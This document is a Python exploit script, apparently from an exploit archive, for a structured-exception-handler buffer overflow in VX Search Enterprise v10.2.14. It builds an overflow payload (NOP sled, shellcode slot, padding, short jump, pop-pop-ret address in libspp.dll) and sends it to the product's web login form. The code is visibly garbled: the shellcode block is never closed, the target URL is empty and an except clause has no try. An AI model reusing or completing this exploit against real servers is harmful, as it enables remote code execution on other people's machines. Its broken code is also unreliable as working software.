print "*** VX Search Enterprise v10.2.14 Buffer Overflow (SEH) ***\n"
# Exploit Title : VX Search Enterprise v10.2.14 Buffer Overflow (SEH)
# Discovery by: W01fier00t
# Twitter : @wolfieroot
# Discovery Date: 22/11/2017
# Software Link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe
# Tested Version: 10.2.14
# Tested on OS: Windows 7 Home Edition sp1
# You will need to enable web server for this to work.
# You will also need the Login to VX Search wepage, for this to work.
import urllib
import urllib2
import socket
#Bad chars \x00\x0a\x0d
#Payload size: 351 bytes
shellcode = (
#0x1001a136 : pop edi # pop esi # ret 0x04 |{PAGE_EXECUTE_READ} [libspp.dll]
cmdname = "\x90" *16
cmdname += shellcode
cmdname += "A" * 157
cmdname += "\xEB\x06"
cmdname += "B" *2
cmdname += "\x36\xa1\x01\x10"
print " [*] Sending payload!..."
url = ''
values = {'command_name' : cmdname}
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req, timeout = 1)
except socket.timeout:
print " [*] DONE! :D\n"